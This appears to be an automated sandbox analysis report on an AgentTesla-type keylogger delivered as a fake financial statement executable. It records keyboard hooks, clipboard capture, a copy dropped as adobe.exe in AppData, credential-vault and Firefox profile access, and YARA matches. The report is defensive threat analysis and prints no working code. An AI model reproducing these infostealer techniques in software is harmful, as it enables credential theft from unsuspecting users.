Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000000.00000002.1658281450.0000000006C32000.00000004.00000800.00020000.00000000.sdmp, Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000000.00000002.1654989039.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000000.00000002.1658168989.0000000005B3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000000.00000002.1654989039.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com~
Source: adobe.exe, 00000009.00000002.1892432130.0000000006F62000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.1889045993.0000000001357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: adobe.exe, 00000009.00000002.1892432130.0000000006F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000000.00000002.1655541150.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.1886764234.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000000.00000002.1655541150.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000003.00000002.4106544369.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.1886764234.0000000000402000.00000040.00000400.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.1890171254.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.4105974724.00000000033EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000003.00000002.4106544369.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.1890171254.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.4105974724.00000000033EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000003.00000002.4106544369.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.1890171254.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.4105974724.00000000033EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: adobe.exe, 00000009.00000002.1892047750.0000000005E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.mic

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49747 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.raw.unpack, JovGVW.cs

.Net Code: _5PXjwm

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Code function: 10_2_06E29AE8 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,06E2A130,00000000,00000000

10_2_06E29AE8

Installs a global keyboard hook

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\adobe\adobe.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\adobe\adobe.exe	Jump to behavior

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.384d5b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.384d5b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.380b580.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.380b580.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 0_2_0098DED4	0_2_0098DED4
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 0_2_04B90006	0_2_04B90006
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 0_2_04B90040	0_2_04B90040
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_015EB397	3_2_015EB397
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_015E4A90	3_2_015E4A90
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_015E3E78	3_2_015E3E78
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_015EEEA8	3_2_015EEEA8
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_015E41C0	3_2_015E41C0
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_06AE28A8	3_2_06AE28A8
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_06AE289A	3_2_06AE289A
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_06B4C0F8	3_2_06B4C0F8
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_06B43018	3_2_06B43018
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_06B46160	3_2_06B46160
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_06B45150	3_2_06B45150
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_06B4AD90	3_2_06B4AD90
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_06B478F8	3_2_06B478F8
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_06B47218	3_2_06B47218
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_06B4E328	3_2_06B4E328
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_06B42340	3_2_06B42340
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_06B40006	3_2_06B40006
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_06B40040	3_2_06B40040
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_06B4584F	3_2_06B4584F
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_0537DED4	5_2_0537DED4
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_05490040	5_2_05490040
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_05490006	5_2_05490006
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_02FF4A90	7_2_02FF4A90
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_02FF3E78	7_2_02FF3E78
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_02FFAE68	7_2_02FFAE68
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_02FF41C0	7_2_02FF41C0
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06D62EA0	7_2_06D62EA0
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06D66560	7_2_06D66560
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06D6B1A8	7_2_06D6B1A8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06D67618	7_2_06D67618
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06D65C60	7_2_06D65C60
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06D60040	7_2_06D60040
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06D6003F	7_2_06D6003F
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 9_2_02C0DED4	9_2_02C0DED4
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_031EA5D0	10_2_031EA5D0
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_031E4A90	10_2_031E4A90
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_031EE8A8	10_2_031EE8A8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_031E3E78	10_2_031E3E78
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_031EADA8	10_2_031EADA8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_031E41C0	10_2_031E41C0
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_06E21734	10_2_06E21734
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_06E22463	10_2_06E22463
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_06E22468	10_2_06E22468
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_06E2EF60	10_2_06E2EF60
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_06E2315E	10_2_06E2315E
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_06E32750	10_2_06E32750
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_06E36560	10_2_06E36560
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_06E35550	10_2_06E35550
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_06E3C0F8	10_2_06E3C0F8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_06E3B1A8	10_2_06E3B1A8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_06E37CF8	10_2_06E37CF8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_06E37618	10_2_06E37618
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_06E3E328	10_2_06E3E328
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_06E30040	10_2_06E30040
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_06E35C60	10_2_06E35C60
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_06E3001F	10_2_06E3001F

Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000000.00000002.1655541150.00000000037C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSoftwareGame.dll: vs Statement JULY #U007e SEP 2024 USD 19,055.00.exe
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000000.00000002.1655541150.00000000037C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamea9d26a1c-7dc5-441c-98a8-6dd01f6d79df.exe4 vs Statement JULY #U007e SEP 2024 USD 19,055.00.exe
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000000.00000002.1655463889.00000000027C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamea9d26a1c-7dc5-441c-98a8-6dd01f6d79df.exe4 vs Statement JULY #U007e SEP 2024 USD 19,055.00.exe
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000000.00000000.1650426459.0000000000316000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameJanioa.exe. vs Statement JULY #U007e SEP 2024 USD 19,055.00.exe
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000000.00000002.1654648982.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Statement JULY #U007e SEP 2024 USD 19,055.00.exe
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000003.00000002.4104071985.00000000010F9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Statement JULY #U007e SEP 2024 USD 19,055.00.exe
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Binary or memory string: OriginalFilenameJanioa.exe. vs Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 7.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.384d5b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.384d5b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.380b580.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.380b580.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload

Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: adobe.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.4da0000.3.raw.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.4da0000.3.raw.unpack, Form1.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.380b580.1.raw.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.380b580.1.raw.unpack, Form1.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.384d5b0.2.raw.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.384d5b0.2.raw.unpack, Form1.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.raw.unpack, yNzg.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.raw.unpack, yNzg.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.raw.unpack, yNzg.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.raw.unpack, yNzg.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.raw.unpack, KNymkUU5gB.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.raw.unpack, KNymkUU5gB.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@15/2@2/2

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe

File created: C:\Users\user\AppData\Roaming\adobe\adobe.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Mutant created: NULL

Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe	ReversingLabs: Detection: 57%
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Virustotal: Detection: 65%

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe

File read: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Jump to behavior

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: winnsi.dll	Jump to behavior
